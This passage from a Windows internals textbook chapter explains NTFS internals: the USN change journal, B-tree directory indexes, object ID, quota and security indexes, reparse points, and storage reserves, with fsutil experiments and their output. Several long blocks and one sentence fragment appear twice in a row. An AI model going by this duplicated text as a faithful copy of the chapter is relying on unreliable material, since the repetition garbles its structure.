: 0x00001000: Rename: old name
Time stamp
: 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
d:\>fsutil usn readjournal d:
...
Usn
: 2656
File name
: Usn.txt
File name length : 14
Reason
: 0x00000100: File create
Time stamp
: 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2736
File name
: Usn.txt
File name length : 14
Reason
: 0x00000102: Data extend | File create
Time stamp
: 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2816
File name
: Usn.txt
File name length : 14
Reason
: 0x80000102: Data extend | File create | Close
Time stamp
: 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2896
File name
: Usn.txt
File name length : 14
Reason
: 0x00001000: Rename: old name
Time stamp
: 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
678
CHAPTER 11
Caching and file systems
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2976
File name
: UsnNew.txt
File name length : 20
Reason
: 0x00002000: Rename: new name
Time stamp
: 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 3056
File name
: UsnNew.txt
File name length : 20
Reason
: 0x80002000: Rename: new name | Close
Time stamp
: 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
The entries reflect the individual modification operations involved in the operations underly-
ing the command-line operations. If the change journal isn’t enabled on a volume (this happens
especially on non-system volumes where no applications have requested file change notification
or the USN Journal creation), you can easily create it with the following command (in the example
a 10-MB journal has been requested):
d:\ >fsutil usn createJournal d: m=10485760 a=2097152
The journal is sparse so that it never overflows; when the journal’s on-disk size exceeds the maxi-
mum defined for the file, NTFS simply begins zeroing the file data that precedes the window of change
information having a size equal to the maximum journal size, as shown in Figure 11-49. To prevent con-
stant resizing when an application is continuously exceeding the journal’s size, NTFS shrinks the journal
only when its size is twice an application-defined value over the maximum configured size.
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2976
File name
: UsnNew.txt
File name length : 20
Reason
: 0x00002000: Rename: new name
Time stamp
: 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 3056
File name
: UsnNew.txt
File name length : 20
Reason
: 0x80002000: Rename: new name | Close
Time stamp
: 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
The entries reflect the individual modification operations involved in the operations underly-
ing the command-line operations. If the change journal isn’t enabled on a volume (this happens
especially on non-system volumes where no applications have requested file change notification
or the USN Journal creation), you can easily create it with the following command (in the example
a 10-MB journal has been requested):
d:\ >fsutil usn createJournal d: m=10485760 a=2097152
CHAPTER 11
Caching and file systems
679
File name
Type of change
Time of change
File MFT entry number
…
$J alternate data stream
Virtual size of $UsnJrnl:$J
Physical size of $UsnJrnl:$J
Change Entry
Empty
…
FIGURE 11-49 Change journal (UsnJrnl) space allocation.
Indexing
In NTFS, a file directory is simply an index of file names—that is, a collection of file names (along with their
file record numbers) organized as a B-tree. To create a directory, NTFS indexes the file name attributes of
the files in the directory. The MFT record for the root directory of a volume is shown in Figure 11-50.
0
1
2
3
1355
1356
1357
1358
file0
file11
file12
file13 file14
file1
file3
File 5
8
9
10
11
2033
2034
2035
2036
VCN
LCN
VCN
LCN
4
5
6
7
1588
1589
1590
1591
VCN
LCN
Standard
information
File name
Index root
Index
allocation
Bitmap
Index of files
file4 file10 file15
"\"
VCN-to-LCN
mappings
file6
file8
file9
FIGURE 11-50 File name index for a volume’s root directory.
680
CHAPTER 11
Caching and file systems
Conceptually, an MFT entry for a directory contains in its index root attribute a sorted list of the
files in the directory. For large directories, however, the file names are actually stored in 4 KB, fixed-
size index buffers (which are the nonresident values of the index allocation attribute) that contain and
organize the file names. Index buffers implement a B-tree data structure, which minimizes the number
of disk accesses needed to find a particular file, especially for large directories. The index root attribute
contains the first level of the B-tree (root subdirectories) and points to index buffers containing the
next level (more subdirectories, perhaps, or files).
Figure 11-50 shows only file names in the index root attribute and the index buffers (file6, for
example), but each entry in an index also contains the record number in the MFT where the file is
described and time stamp and file size information for the file. NTFS duplicates the time stamps and
file size information from the file’s MFT record. This technique, which is used by FAT and NTFS, requires
updated information to be written in two places. Even so, it’s a significant speed optimization for direc-
tory browsing because it enables the file system to display each file’s time stamps and size without
opening every file in the directory.
The index allocation attribute maps the VCNs of the index buffer runs to the LCNs that indicate
where the index buffers reside on the disk, and the bitmap attribute keeps track of which VCNs in the
index buffers are in use and which are free. Figure 11-50 shows one file entry per VCN (that is, per clus-
ter), but file name entries are actually packed into each cluster. Each 4 KB index buffer will typically con-
tain about 20 to 30 file name entries (depending on the lengths of the file names within the directory).
The B-tree data structure is a type of balanced tree that is ideal for organizing sorted data stored on
a disk because it minimizes the number of disk accesses needed to find an entry. In the MFT, a direc-
tory’s index root attribute contains several file names that act as indexes into the second level of the
B-tree. Each file name in the index root attribute has an optional pointer associated with it that points
to an index buffer. The index buffer points to containing file names with lexicographic values less than
its own. In Figure 11-50, for example, file4 is a first-level entry in the B-tree. It points to an index buffer
containing file names that are (lexicographically) less than itself—the file names file0, file1, and file3.
Note that the names file1, file3, and so on that are used in this example are not literal file names but
names intended to show the relative placement of files that are lexicographically ordered according to
the displayed sequence.
Storing the file names in B-trees provides several benefits. Directory lookups are fast because the
file names are stored in a sorted order. And when higher-level software enumerates the files in a direc-
tory, NTFS returns already-sorted names. Finally, because B-trees tend to grow wide rather than deep,
NTFS’s fast lookup times don’t degrade as directories grow.
NTFS also provides general support for indexing data besides file names, and several NTFS fea-
tures—including object IDs, quota tracking, and consolidated security—use indexing to manage
internal data.
The B-tree indexes are a generic capability of NTFS and are used for organizing security descriptors,
security IDs, object IDs, disk quota records, and reparse points. Directories are referred to as file name
indexes whereas other types of indexes are known as view indexes.
CHAPTER 11
Caching and file systems
681
Object IDs
In addition to storing the object ID assigned to a file or directory in the OBJECT_ID attribute of its
MFT record, NTFS also keeps the correspondence between object IDs and their file record numbers in
the O index of the \Extend\ObjId metadata file. The index collates entries by object ID (which is a
GUID), making it easy for NTFS to quickly locate a file based on its ID. This feature allows applications,
using the NtCreateFile native API with the FILE_OPEN_BY_FILE_ID flag, to open a file or directory using
its object ID. Figure 11-51 demonstrates the correspondence of the ObjId metadata file and OBJECT_
ID attributes in MFT records.
ID passed when an
application opens a
file using its object ID
$O index
$ObjId metadata file MFT entry
MFT
Object ID 0
MFT entry number
FILE_OBJECTID_BUFFER
MFT entry number
FILE_OBJECTID_BUFFER
Object ID 1
Object ID 2
MFT entry number
FILE_OBJECTID_BUFFER
Standard
information
$O index
root
$O index
allocation
Filename
File 3
$OBJECT_ID
File 1
$OBJECT_ID
File 2
$OBJECT_ID
…
FIGURE 11-51 ObjId and OBJECT_ID relationships.
Quota tracking
NTFS stores quota information in the \Extend\Quota metadata file, which consists of the named
index root attributes O and Q. Figure 11-52 shows the organization of these indexes. Just as NTFS
assigns each security descriptor a unique internal security ID, NTFS assigns each user a unique user ID.
When an administrator defines quota information for a user, NTFS allocates a user ID that corresponds
to the user’s SID. In the O index, NTFS creates an entry that maps an SID to a user ID and sorts the
index by SID; in the Q index, NTFS creates a quota control entry. A quota control entry contains the
value of the user’s quota limits, as well as the amount of disk space the user consumes on the volume.
When an application creates a file or directory, NTFS obtains the application user’s SID and looks up
the associated user ID in the O index. NTFS records the user ID in the new file or directory’s STANDARD_
INFORMATION attribute, which counts all disk space allocated to the file or directory against that user’s
quota. Then NTFS looks up the quota entry in the Q index and determines whether the new allocation
causes the user to exceed his or her warning or limit threshold. When a new allocation causes the user to
682
CHAPTER 11
Caching and file systems
exceed a threshold, NTFS takes appropriate steps, such as logging an event to the System event log or
not letting the user create the file or directory. As a file or directory changes size, NTFS updates the quota
control entry associated with the user ID stored in the STANDARD_INFORMATION attribute. NTFS uses
the NTFS generic B-tree indexing to efficiently correlate user IDs with account SIDs and, given a user ID, to
efficiently look up a user’s quota control information.
SID taken from
application when a file
or directory is created
$O index
SID 0
User ID 0
SID 1
User ID 1
SID 2
User ID 2
User ID taken from a file’s
$STANDARD_INFORMATION
attribute during a file operation
$Q index
User ID 0
Quota entry for user 0
User ID 1
Quota entry for user 1
User ID 2
Quota entry for user 2
FIGURE 11-52 Quota indexing.
Consolidated security
NTFS has always supported security, which lets an administrator specify which users can and can’t access
individual files and directories. NTFS optimizes disk utilization for security descriptors by using a central
metadata file named Secure to store only one instance of each security descriptor on a volume.
The Secure file contains two index attributes—SDH (Security Descriptor Hash) and SII (Security
ID Index)—and a data-stream attribute named SDS (Security Descriptor Stream), as Figure 11-53
shows. NTFS assigns every unique security descriptor on a volume an internal NTFS security ID (not to
be confused with a Windows SID, which uniquely identifies computers and user accounts) and hashes
the security descriptor according to a simple hash algorithm. A hash is a potentially nonunique short-
hand representation of a descriptor. Entries in the SDH index map the security descriptor hashes to
the security descriptor’s storage location within the SDS data attribute, and the SII index entries map
NTFS security IDs to the security descriptor’s location in the SDS data attribute.
When you apply a security descriptor to a file or directory, NTFS obtains a hash of the descriptor and
looks through the SDH index for a match. NTFS sorts the SDH index entries according to the hash of
their corresponding security descriptor and stores the entries in a B-tree. If NTFS finds a match for the de-
scriptor in the SDH index, NTFS locates the offset of the entry’s security descriptor from the entry’s offset
value and reads the security descriptor from the SDS attribute. If the hashes match but the security
descriptors don’t, NTFS looks for another matching entry in the SDH index. When NTFS finds a precise
match, the file or directory to which you’re applying the security descriptor can reference the existing
security descriptor in the SDS attribute. NTFS makes the reference by reading the NTFS security identifier
CHAPTER 11
Caching and file systems
683
from the SDH entry and storing it in the file or directory’s STANDARD_INFORMATION attribute. The
NTFS STANDARD_INFORMATION attribute, which all files and directories have, stores basic information
about a file, including its attributes, time stamp information, and security identifier.
Hash of a security
descriptor when a security
setting is applied to a
file or directory
$SDH index
Hash 1
$SDS offset
Hash 2
$SDS offset
Hash 0
$SDS offset
$SDS data stream
Security descriptor
0
Security descriptor
1
Security descriptor
2
ID taken from a file’s
$STANDARD_INFORMATION
attribute during a file or
directory security check
$SII index
NTFS security ID 0
$SDS offset
NTFS security ID 1
$SDS offset
NTFS security ID 2
$SDS offset
FIGURE 11-53 Secure indexing.
If NTFS doesn’t find in the SDH index an entry that has a security descriptor that matches the de-
scriptor you’re applying, the descriptor you’re applying is unique to the volume, and NTFS assigns the
descriptor a new internal security ID. NTFS internal security IDs are 32-bit values, whereas SIDs are typi-
cally several times larger, so representing SIDs with NTFS security IDs saves space in the STANDARD_
INFORMATION attribute. NTFS then adds the security descriptor to the end of the SDS data attribute,
and it adds to the SDH and SII indexes entries that reference the descriptor’s offset in the SDS data.
When an application attempts to open a file or directory, NTFS uses the SII index to look up the file
or directory’s security descriptor. NTFS reads the file or directory’s internal security ID from the MFT
entry’s STANDARD_INFORMATION attribute. It then uses the Secure file’s SII index to locate the ID’s
entry in the SDS data attribute. The offset into the SDS attribute lets NTFS read the security descrip-
tor and complete the security check. NTFS stores the 32 most recently accessed security descriptors
with their SII index entries in a cache so that it accesses the Secure file only when the SII isn’t cached.
NTFS doesn’t delete entries in the Secure file, even if no file or directory on a volume references the
entry. Not deleting these entries doesn’t significantly decrease disk space because most volumes, even
those used for long periods, have relatively few unique security descriptors.
NTFS’s use of generic B-tree indexing lets files and directories that have the same security settings
efficiently share security descriptors. The SII index lets NTFS quickly look up a security descriptor in
the Secure file while performing security checks, and the SDH index lets NTFS quickly determine
whether a security descriptor being applied to a file or directory is already stored in the Secure file
and can be shared.
684
CHAPTER 11
Caching and file systems
Reparse points
As described earlier in the chapter, a reparse point is a block of up to 16 KB of application-defined
reparse data and a 32-bit reparse tag that are stored in the REPARSE_POINT attribute of a file or direc-
tory. Whenever an application creates or deletes a reparse point, NTFS updates the \Extend\Reparse
metadata file, in which NTFS stores entries that identify the file record numbers of files and directories
that contain reparse points. Storing the records in a central location enables NTFS to provide interfaces
for applications to enumerate all a volume’s reparse points or just specific types of reparse points, such
as mount points. The \Extend\Reparse file uses the generic B-tree indexing facility of NTFS by collat-
ing the file’s entries (in an index named R) by reparse point tags and file record numbers.
EXPERIMENT: Looking at different reparse points
A file or directory reparse point can contain any kind of arbitrary data. In this experiment, we use
the built-in fsutil.exe tool to analyze the reparse point content of a symbolic link and of a Modern
application’s AppExecutionAlias, similar to the experiment in Chapter 8. First you need to create a
symbolic link:
C:\>mklink test_link.txt d:\Test.txt
symbolic link created for test_link.txt <<===>> d:\Test.txt
Then you can use the fsutil reparsePoint query command to examine the reparse point content:
C:\>fsutil reparsePoint query test_link.txt
Reparse Tag Value : 0xa000000c
Tag value: Microsoft
Tag value: Name Surrogate
Tag value: Symbolic Link
Reparse Data Length: 0x00000040
Reparse Data:
0000: 16 00 1e 00 00 00 16 00 00 00 00 00 64 00 3a 00 ............d.:.
0010: 5c 00 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 \.T.e.s.t...t.x.
0020: 74 00 5c 00 3f 00 3f 00 5c 00 64 00 3a 00 5c 00 t.\.?.?.\.d.:.\.
0030: 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 74 00 T.e.s.t...t.x.t.
As expected, the content is a simple data structure (REPARSE_DATA_BUFFER, documented in
Microsoft Docs), which contains the symbolic link target and the printed file name. You can even
delete the reparse point by using fsutil reparsePoint delete command:
C:\>more test_link.txt
This is a test file!
C:\>fsutil reparsePoint delete test_link.txt
C:\>more test_link.txt
EXPERIMENT: Looking at different reparse points
A file or directory reparse point can contain any kind of arbitrary data. In this experiment, we use
the built-in fsutil.exe tool to analyze the reparse point content of a symbolic link and of a Modern
application’s AppExecutionAlias, similar to the experiment in Chapter 8. First you need to create a
symbolic link:
C:\>mklink test_link.txt d:\Test.txt
symbolic link created for test_link.txt <<===>> d:\Test.txt
Then you can use the fsutil reparsePoint query command to examine the reparse point content:
fsutil reparsePoint query command to examine the reparse point content:
fsutil reparsePoint query
C:\>fsutil reparsePoint query test_link.txt
Reparse Tag Value : 0xa000000c
Tag value: Microsoft
Tag value: Name Surrogate
Tag value: Symbolic Link
Reparse Data Length: 0x00000040
Reparse Data:
0000: 16 00 1e 00 00 00 16 00 00 00 00 00 64 00 3a 00 ............d.:.
0010: 5c 00 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 \.T.e.s.t...t.x.
0020: 74 00 5c 00 3f 00 3f 00 5c 00 64 00 3a 00 5c 00 t.\.?.?.\.d.:.\.
0030: 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 74 00 T.e.s.t...t.x.t.
As expected, the content is a simple data structure (REPARSE_DATA_BUFFER, documented in
Microsoft Docs), which contains the symbolic link target and the printed file name. You can even
delete the reparse point by using fsutil reparsePoint delete command:
C:\>more test_link.txt
This is a test file!
C:\>fsutil reparsePoint delete test_link.txt
C:\>more test_link.txt
CHAPTER 11
Caching and file systems
685
If you delete the reparse point, the file become a 0 bytes file. This is by design because the
unnamed data stream (DATA) in the link file is empty. You can repeat the experiment with an
AppExecutionAlias of an installed Modern application (in the following example, Spotify was used):
C:\>cd C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps
C:\Users\andrea\AppData\Local\Microsoft\WindowsApps>fsutil reparsePoint query Spotify.exe
Reparse Tag Value : 0x8000001b
Tag value: Microsoft
Reparse Data Length: 0x00000178
Reparse Data:
0000: 03 00 00 00 53 00 70 00 6f 00 74 00 69 00 66 00 ....S.p.o.t.i.f.
0010: 79 00 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 y.A.B...S.p.o.t.
0020: 69 00 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 i.f.y.M.u.s.i.c.
0030: 5f 00 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 _.z.p.d.n.e.k.d.
0040: 72 00 7a 00 72 00 65 00 61 00 30 00 00 00 53 00 r.z.r.e.a.0...S
0050: 70 00 6f 00 74 00 69 00 66 00 79 00 41 00 42 00 p.o.t.i.f.y.A.B.
0060: 2e 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00 ..S.p.o.t.i.f.y.
0070: 4d 00 75 00 73 00 69 00 63 00 5f 00 7a 00 70 00 M.u.s.i.c._.z.p.
0080: 64 00 6e 00 65 00 6b 00 64 00 72 00 7a 00 72 00 d.n.e.k.d.r.z.r.
0090: 65 00 61 00 30 00 21 00 53 00 70 00 6f 00 74 00 e.a.0.!.S.p.o.t.
00a0: 69 00 66 00 79 00 00 00 43 00 3a 00 5c 00 50 00 i.f.y...C.:.\.P.
00b0: 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 r.o.g.r.a.m. .F.
00c0: 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 i.l.e.s.\.W.i.n.
00d0: 64 00 6f 00 77 00 73 00 41 00 70 00 70 00 73 00 d.o.w.s.A.p.p.s.
00e0: 5c 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00 \.S.p.o.t.i.f.y.
00f0: 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 69 00 A.B...S.p.o.t.i.
0100: 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 5f 00 f.y.M.u.s.i.c._.
0110: 31 00 2e 00 39 00 34 00 2e 00 32 00 36 00 32 00 1...9.4...2.6.2.
0120: 2e 00 30 00 5f 00 78 00 38 00 36 00 5f 00 5f 00 ..0._.x.8.6._._.
0130: 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 72 00 z.p.d.n.e.k.d.r.
0140: 7a 00 72 00 65 00 61 00 30 00 5c 00 53 00 70 00 z.r.e.a.0.\.S.p.
0150: 6f 00 74 00 69 00 66 00 79 00 4d 00 69 00 67 00 o.t.i.f.y.M.i.g.
0160: 72 00 61 00 74 00 6f 00 72 00 2e 00 65 00 78 00 r.a.t.o.r...e.x.
0170: 65 00 00 00 30 00 00 00 e...0...
From the preceding output, we can see another kind of reparse point, the AppExecutionAlias,
used by Modern applications. More information is available in Chapter 8.
Storage reserves and NTFS reservations
Windows Update and the Windows Setup application must be able to correctly apply important se-
curity updates, even when the system volume is almost full (they need to ensure that there is enough
disk space). Windows 10 introduced Storage Reserves as a way to achieve this goal. Before we de-
scribe the Storage Reserves, it is necessary that you understand how NTFS reservations work and why
they’re needed.
When the NTFS file system mounts a volume, it calculates the volume’s in-use and free space. No
on-disk attributes exist for keeping track of these two counters; NTFS maintains and stores the Volume
bitmap on disk, which represents the state of all the clusters in the volume. The NTFS mounting code
scans the bitmap and counts the number of used clusters, which have their bit set to 1 in the bitmap,
If you delete the reparse point, the file become a 0 bytes file. This is by design because the
unnamed data stream (DATA) in the link file is empty. You can repeat the experiment with an
AppExecutionAlias of an installed Modern application (in the following example, Spotify was used):
C:\>cd C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps
C:\Users\andrea\AppData\Local\Microsoft\WindowsApps>fsutil reparsePoint query Spotify.exe
Reparse Tag Value : 0x8000001b
Tag value: Microsoft
Reparse Data Length: 0x00000178
Reparse Data:
0000: 03 00 00 00 53 00 70 00 6f 00 74 00 69 00 66 00 ....S.p.o.t.i.f.
0010: 79 00 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 y.A.B...S.p.o.t.
0020: 69 00 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 i.f.y.M.u.s.i.c.
0030: 5f 00 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 _.z.p.d.n.e.k.d.
0040: 72 00 7a 00 72 00 65 00 61 00 30 00 00 00 53 00 r.z.r.e.a.0...S
0050: 70 00 6f 00 74 00 69 00 66 00 79 00 41 00 42 00 p.o.t.i.f.y.A.B.
0060: 2e 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00 ..S.p.o.t.i.f.y.
0070: 4d 00 75 00 73 00 69 00 63 00 5f 00 7a 00 70 00 M.u.s.i.c._.z.p.
0080: 64 00 6e 00 65 00 6b 00 64 00 72 00 7a 00 72 00 d.n.e.k.d.r.z.r.
0090: 65 00 61 00 30 00 21 00 53 00 70 00 6f 00 74 00 e.a.0.!.S.p.o.t.
00a0: 69 00 66 00 79 00 00 00 43 00 3a 00 5c 00 50 00 i.f.y...C.:.\.P.
00b0: 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 r.o.g.r.a.m. .F.
00c0: 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00 i.l.e.s.\.W.i.n.
00d0: 64 00 6f 00 77 00 73 00 41 00 70 00 70 00 73 00 d.o.w.s.A.p.p.s.
00e0: 5c 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00 \.S.p.o.t.i.f.y.
00f0: 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 69 00 A.B...S.p.o.t.i.
0100: 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 5f 00 f.y.M.u.s.i.c._.
0110: 31 00 2e 00 39 00 34 00 2e 00 32 00 36 00 32 00 1...9.4...2.6.2.
0120: 2e 00 30 00 5f 00 78 00 38 00 36 00 5f 00 5f 00 ..0._.x.8.6._._.
0130: 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 72 00 z.p.d.n.e.k.d.r.
0140: 7a 00 72 00 65 00 61 00 30 00 5c 00 53 00 70 00 z.r.e.a.0.\.S.p.
0150: 6f 00 74 00 69 00 66 00 79 00 4d 00 69 00 67 00 o.t.i.f.y.M.i.g.
0160: 72 00 61 00 74 00 6f 00 72 00 2e 00 65 00 78 00 r.a.t.o.r...e.x.
0170: 65 00 00 00 30 00 00 00 e...0...
From the preceding output, we can see another kind of reparse point, the AppExecutionAlias,
used by Modern applications. More information is available in Chapter 8.
686
CHAPTER 11
Caching and file systems
and, through a simple equation (total number of clusters of the volume minus the number of used
ones), calculates the number of free clusters. The two calculated counters are stored in the volume con-
trol block (VCB) data structure, which represents the mounted volume and exists only in memory until
the volume is dismounted.
During normal volume I/O activity, NTFS must maintain the total number of reserved clusters. This
counter needs to exist for the following reasons:
I
When writing to compressed and sparse files, the system must ensure that the entire file is
writable because an application that is operating on this kind of file could potentially store valid
uncompressed data on the entire file.
I
The first time a writable image-backed section is created, the file system must reserve available
space for the entire section size, even if no physical space is still allocated in the volume.
I
The USN Journal and TxF use the counter to ensure that there is space available for the USN log
and NTFS transactions.
NTFS maintains another counter during normal I/O activities, Total Free Available Space, which is the
final space that a user can see and use for storing new files or data. These three concepts are parts of
NTFS Reservations. The important characteristic of NTFS Reservations is that the counters are only in-
memory volatile representations, which will be destroyed at volume dismounting time.
Storage Reserve is a feature based on NTFS reservations, which allow files to have an assigned
Storage Reserve area. Storage Reserve defines 15 different reservation areas (2 of which are reserved by
the OS), which are defined and stored both in memory and in the NTFS on-disk data structures.
To use the new on-disk reservations, an application defines a volume’s Storage Reserve area by
using the FSCTL_QUERY_STORAGE_RESERVE file system control code, which specifies, through a data
structure, the total amount of reserved space and an Area ID. This will update multiple counters in the
VCB (Storage Reserve areas are maintained in-memory) and insert new data in the $SRAT named data
stream of the Bitmap metadata file. The SRAT data stream contains a data structure that tracks each
Reserve area, including the number of reserved and used clusters. An application can query informa-
tion about Storage Reserve areas through the FSCTL_QUERY_STORAGE_RESERVE file system control
code and can delete a Storage Reserve using the FSCTL_DELETE_STORAGE_RESERVE code.
After a Storage Reserve area is defined, the application is guaranteed that the space will no lon-
ger be used by any other components. Applications can then assign files and directories to a Storage
Reserve area using the NtSetInformationFile native API with the FileStorageReserveIdInformationEx in-
formation class. The NTFS file system driver manages the request by updating the in-memory reserved
and used clusters counters of the Reserve area, and by updating the volume’s total number of reserved
clusters that belong to NTFS reservations. It also stores and updates the on-disk STANDARD_INFO at-
tribute of the target file. The latter maintains 4 bits to store the Storage Reserve area ID. In this way, the
system is able to quickly enumerate each file that belongs to a reserve area by just parsing MFT entries.
(NTFS implements the enumeration in the FSCTL_QUERY_FILE_LAYOUT code’s dispatch function.) A
user can enumerate the files that belong to a Storage Reserve by using the fsutil storageReserve
findyID command, specifying the volume path name and Storage Reserve ID she is interested in.
CHAPTER 11
Caching and file systems
687
Several basic file operations have new side effects due to Storage Reserves, like file creation and
renaming. Newly created files or directories will automatically inherit the storage reserve ID of their
parent; the same applies for files or directories that get renamed (moved) to a new parent. Since a
rename operation can change the Storage Reserve ID of the file or directory, this implies that the op-
eration might fail due to lack of disk space. Moving a nonempty directory to a new parent implies that
the new Storage Reserve ID is recursively applied to all the files and subdirectories. When the reserved
space of a Storage Reserve ends, the system starts to use the volume’s free available space, so there is
no guarantee that the operation always succeeds.
EXPERIMENT: Witnessing storage reserves
Starting from the May 2019 Update of Windows 10 (19H1), you can look at the existing NTFS
reserves through the built-in fsutil.exe tool:
C:\>fsutil storagereserve query c:
Reserve ID: 1
Flags: 0x00000000
Space Guarantee: 0x0
(0 MB)
Space Used: 0x0
(0 MB)
Reserve ID: 2
Flags:
0x00000000
Space Guarantee: 0x0
(0 MB)
Space Used:
0x199ed000
(409 MB)
Windows Setup defines two NTFS reserves: a Hard reserve (ID 1), used by the Setup applica-
tion to store its files, which can’t be deleted or replaced by other applications, and a Soft reserve
(ID 2), which is used to store temporary files, like system logs and Windows Update downloaded
files. In the preceding example, the Setup application has been already able to install all its files
(and no Windows Update is executing), so the Hard Reserve is empty; the Soft reserve has all its
reserved space allocated. You can enumerate all the files that belong to the reserve using the
fsutil storagereserve findyId command. (Be aware that the output is very large, so you might
consider redirecting the output to a file using the > operator.)
C:\>fsutil storagereserve findbyid c: 2
...
********* File 0x0002000000018762 *********
File reference number : 0x0002000000018762
File attributes
: 0x00000020: Archive
File entry flags : 0x00000000
Link (ParentID: Name) : 0x0001000000001165: NTFS Name :
Windows\System32\winevt\Logs\OAlerts.evtx
Link (ParentID: Name) : 0x0001000000001165: DOS Name : OALERT~1.EVT
Creation Time
: 12/9/2018 3:26:55
Last Access Time
: 12/10/2018 0:21:57
Last Write Time
: 12/10/2018 0:21:57
Change Time
: 12/10/2018 0:21:57
LastUsn
: 44,846,752
OwnerId
: 0
SecurityId
: 551
EXPERIMENT: Witnessing storage reserves
Starting from the May 2019 Update of Windows 10 (19H1), you can look at the existing NTFS
reserves through the built-in fsutil.exe tool:
C:\>fsutil storagereserve query c:
Reserve ID: 1
Flags: 0x00000000
Space Guarantee: 0x0
(0 MB)
Space Used: 0x0
(0 MB)
Reserve ID: 2
Flags:
0x00000000
Space Guarantee: 0x0
(0 MB)
Space Used:
0x199ed000
(409 MB)
Windows Setup defines two NTFS reserves: a Hard reserve (ID 1), used by the Setup applica-
tion to store its files, which can’t be deleted or replaced by other applications, and a Soft reserve
(ID 2), which is used to store temporary files, like system logs and Windows Update downloaded
files. In the preceding example, the Setup application has been already able to install all its files
(and no Windows Update is executing), so the Hard Reserve is empty; the Soft reserve has all its
reserved space allocated. You can enumerate all the files that belong to the reserve using the
fsutil storagereserve findyId command. (Be aware that the output is very large, so you might
consider redirecting the output to a file using the > operator.)
C:\>fsutil storagereserve findbyid c: 2
...
********* File 0x0002000000018762 *********
File reference number : 0x0002000000018762
File attributes
: 0x00000020: Archive
File entry flags : 0x00000000
Link (ParentID: Name) : 0x0001000000001165: NTFS Name :
Windows\System32\winevt\Logs\OAlerts.evtx
Link (ParentID: Name) : 0x0001000000001165: DOS Name : OALERT~1.EVT
Creation Time
: 12/9/2018 3:26:55
Last Access Time
: 12/10/2018 0:21:57
Last Write Time
: 12/10/2018 0:21:57
Change Time
: 12/10/2018 0:21:57
LastUsn
: 44,846,752
OwnerId
: 0
SecurityId
: 551
688
CHAPTER 11
Caching and file systems
StorageReserveId
: 2
Stream
: 0x010 ::$STANDARD_INFORMATION
Attributes
: 0x00000000: *NONE*
Flags
: 0x0000000c: Resident | No clusters allocated
Size
: 72
Allocated Size
: 72
Stream
: 0x030 ::$FILE_NAME
Attributes
: 0x00000000: *NONE*
Flags
: 0x0000000c: Resident | No clusters allocated
Size
: 90
Allocated Size
: 96
Stream
: 0x030 ::$FILE_NAME
Attributes
: 0x00000000: *NONE*
Flags
: 0x0000000c: Resident | No clusters allocated
Size
: 90
Allocated Size
: 96
Stream
: 0x080 ::$DATA
Attributes
: 0x00000000: *NONE*
Flags
: 0x00000000: *NONE*
Size
: 69,632
Allocated Size
: 69,632
Extents
: 1 Extents
: 1: VCN: 0 Clusters: 17 LCN: 3,820,235
Transaction support
By leveraging the Kernel Transaction Manager (KTM) support in the kernel, as well as the facilities pro-
vided by the Common Log File System, NTFS implements a transactional model called transactional NTFS
or TxF. TxF provides a set of user-mode APIs that applications can use for transacted operations on their
